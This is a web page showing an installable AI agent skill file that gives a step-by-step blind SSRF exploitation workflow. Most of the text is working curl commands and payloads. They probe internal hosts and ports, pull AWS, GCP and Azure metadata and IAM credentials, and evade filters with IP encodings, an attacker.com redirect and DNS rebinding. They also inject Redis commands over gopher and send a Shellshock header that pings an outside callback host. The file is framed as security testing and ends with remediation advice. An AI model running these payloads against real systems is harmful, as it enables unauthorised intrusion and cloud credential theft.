Agent-Skills.md

Agent Skills: Performing Blind SSRF Exploitation

Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions, and timing analysis to access internal services and cloud metadata endpoints.

UncategorizedID: plurigrid/asi/performing-blind-ssrf-exploitation

Repository

plurigrid/asi
plurigridLicense: MIT
165

Install this agent skill to your local

pnpm dlx add-skill https://github.com/plurigrid/asi/tree/HEAD/plugins/asi/skills/performing-blind-ssrf-exploitation

Skill Files

Browse the full folder contents for performing-blind-ssrf-exploitation.

Download Skill

Loading file tree…

plugins/asi/skills/performing-blind-ssrf-exploitation/SKILL.md

Skill Metadata

Name
performing-blind-ssrf-exploitation
Description
Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions, and timing analysis to access internal services and cloud metadata endpoints.

Performing Blind SSRF Exploitation

When to Use

  • When testing URL/webhook input parameters where server-side responses are not reflected
  • During assessment of applications that fetch external resources (avatars, previews, imports)
  • When testing PDF generators, image processors, or document converters for SSRF
  • During cloud security assessments to detect metadata endpoint access
  • When evaluating webhook functionality and URL validation implementations

Prerequisites

  • Burp Suite Professional with Burp Collaborator for OOB detection
  • interact.sh or webhook.site for external callback monitoring
  • Understanding of SSRF attack vectors and internal network enumeration
  • Knowledge of cloud metadata endpoints (AWS, GCP, Azure)
  • VPS or controlled server for advanced exploitation callback handling
  • Python with requests library for automation scripts

Workflow

Step 1 — Identify Blind SSRF Input Points

# Common SSRF-susceptible parameters:
# url=, uri=, path=, dest=, redirect=, src=, source=
# link=, imageURL=, callback=, webhook=, feed=, import=

# Test URL fetch functionality
curl -X POST http://target.com/api/fetch-url \
  -H "Content-Type: application/json" \
  -d '{"url": "http://BURP-COLLABORATOR-SUBDOMAIN.oastify.com"}'

# Test webhook configuration
curl -X POST http://target.com/api/webhooks \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"callback_url": "http://COLLABORATOR.oastify.com/webhook"}'

# Test image/avatar URL
curl -X POST http://target.com/api/profile/avatar \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"avatar_url": "http://COLLABORATOR.oastify.com/avatar.png"}'

# Test document import
curl -X POST http://target.com/api/import \
  -H "Content-Type: application/json" \
  -d '{"import_url": "http://COLLABORATOR.oastify.com/data.csv"}'

Step 2 — Confirm Blind SSRF with Out-of-Band Detection

# Use Burp Collaborator for DNS + HTTP callbacks
# Generate collaborator payload: xxxxxx.oastify.com

# DNS-based detection (works even with HTTP blocked)
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://dns-only-test.COLLABORATOR.oastify.com"}'
# Check Collaborator for DNS lookups

# HTTP-based detection
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://http-test.COLLABORATOR.oastify.com"}'
# Check for HTTP requests in Collaborator

# interact.sh alternative
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://RANDOM.interact.sh"}'
# Monitor interact.sh dashboard for interactions

Step 3 — Enumerate Internal Network

# Scan internal IP ranges via blind SSRF
# Use timing differences to determine if hosts are alive

# Scan common internal ranges
for ip in 10.0.0.{1..10} 172.16.0.{1..10} 192.168.1.{1..10}; do
  start=$(date +%s%N)
  curl -X POST http://target.com/api/fetch -d "{\"url\": \"http://$ip/\"}" -s -o /dev/null --max-time 5
  end=$(date +%s%N)
  elapsed=$(( (end - start) / 1000000 ))
  echo "$ip: ${elapsed}ms"
done

# Port scanning via blind SSRF
for port in 80 443 8080 8443 3000 5000 6379 27017 5432 3306 9200; do
  curl -X POST http://target.com/api/fetch \
    -d "{\"url\": \"http://127.0.0.1:$port/\"}" -s -o /dev/null -w "%{time_total}\n"
  echo "Port $port tested"
done

# Use gopher:// for more advanced internal service interaction
curl -X POST http://target.com/api/fetch \
  -d '{"url": "gopher://127.0.0.1:6379/_INFO"}'

Step 4 — Access Cloud Metadata Endpoints

# AWS metadata (IMDSv1)
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'

# AWS IAM credentials
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'

# GCP metadata
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://metadata.google.internal/computeMetadata/v1/"}'

# Azure metadata
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"}'

# DNS rebinding for metadata access (bypass IP blocking)
# Use services like rebinder.net to create DNS rebinding domains
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://A.169.254.169.254.1time.YOUR-REBIND-DOMAIN.com/"}'

Step 5 — Bypass SSRF Filters

# IP representation bypass
curl -X POST http://target.com/api/fetch -d '{"url": "http://0x7f000001/"}'       # Hex
curl -X POST http://target.com/api/fetch -d '{"url": "http://2130706433/"}'         # Decimal
curl -X POST http://target.com/api/fetch -d '{"url": "http://0177.0.0.1/"}'         # Octal
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.1/"}'              # Short
curl -X POST http://target.com/api/fetch -d '{"url": "http://[::1]/"}'              # IPv6

# URL parsing confusion
curl -X POST http://target.com/api/fetch -d '{"url": "http://target.com@127.0.0.1/"}'
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.0.0.1#@target.com/"}'

# Redirect-based bypass
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://attacker.com/redirect?url=http://169.254.169.254/"}'

# DNS rebinding
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://make-169-254-169-254-rr.1u.ms/"}'

Step 6 — Escalate Blind SSRF to Data Exfiltration

# Exfiltrate data via DNS (when only DNS callback works)
# If you achieve SSRF to a service that reflects data:
# Chain: SSRF -> internal service -> DNS exfiltration

# Use gopher protocol for Redis command execution
curl -X POST http://target.com/api/fetch \
  -d '{"url": "gopher://127.0.0.1:6379/_SET%20ssrf_test%20exploited%0AQUIT"}'

# Chain blind SSRF with Shellshock on internal hosts
curl -X POST http://target.com/api/fetch \
  -d '{"url": "http://internal-cgi-server/cgi-bin/test.sh"}'
# With User-Agent: () { :; }; /bin/bash -c "ping -c1 COLLABORATOR.oastify.com"

# Exploit internal services via SSRF
# Redis: write SSH key
# Memcached: inject serialized objects
# Elasticsearch: read indices
# Internal API: access authenticated endpoints

Key Concepts

| Concept | Description | |---------|-------------| | Blind SSRF | Server makes request but response is not visible to attacker | | Out-of-Band Detection | Using external callbacks (DNS, HTTP) to confirm SSRF execution | | DNS Rebinding | Technique to bypass IP-based SSRF filters by changing DNS resolution | | Cloud Metadata | Instance metadata endpoints accessible via SSRF for credential theft | | Gopher Protocol | Protocol allowing crafted payloads to interact with internal TCP services | | Time-Based Detection | Detecting SSRF success by measuring response time differences | | SSRF Chain | Combining SSRF with other vulnerabilities for greater impact |

Tools & Systems

| Tool | Purpose | |------|---------| | Burp Collaborator | Out-of-band interaction server for DNS and HTTP callback detection | | interact.sh | Open-source OOB interaction tool by ProjectDiscovery | | SSRFmap | Automated SSRF detection and exploitation framework | | Gopherus | Generate gopher payloads for exploiting internal services via SSRF | | webhook.site | Free webhook receiver for testing SSRF callbacks | | rebinder.net | DNS rebinding service for bypassing SSRF IP filters |

Common Scenarios

  1. Cloud Credential Theft — Exploit blind SSRF to access AWS/GCP/Azure metadata endpoints and steal IAM credentials for cloud account compromise
  2. Internal Service Discovery — Use timing-based blind SSRF to enumerate internal network hosts and open ports
  3. Redis Exploitation — Chain blind SSRF with gopher:// protocol to execute commands on internal Redis instances
  4. Webhook Abuse — Exploit webhook URL fields to scan internal networks and exfiltrate data through OOB channels
  5. PDF Generator SSRF — Inject internal URLs into PDF generation features to exfiltrate internal content in rendered documents

Output Format

## Blind SSRF Assessment Report
- **Target**: http://target.com/api/fetch-url
- **Detection Method**: Burp Collaborator DNS + HTTP callback
- **Internal Access Confirmed**: Yes

### Findings
| # | Input Point | Payload | Detection | Impact |
|---|------------|---------|-----------|--------|
| 1 | POST /api/fetch url parameter | http://collaborator | HTTP callback | Confirmed SSRF |
| 2 | POST /api/avatar avatar_url | http://169.254.169.254 | Timing (2.3s vs 0.1s) | Cloud metadata |
| 3 | POST /api/webhook callback | gopher://127.0.0.1:6379 | Redis write confirmed | RCE potential |

### Internal Network Map
| Host | Port | Service | Accessible |
|------|------|---------|-----------|
| 10.0.0.5 | 6379 | Redis | Yes |
| 10.0.0.10 | 9200 | Elasticsearch | Yes |
| 169.254.169.254 | 80 | AWS Metadata | Yes |

### Remediation
- Implement allowlist of permitted external domains for URL fetching
- Block requests to private IP ranges and cloud metadata endpoints
- Use IMDSv2 (token-required) for AWS instance metadata
- Disable unused URL schemes (gopher, file, dict)
- Implement network-level segmentation for application servers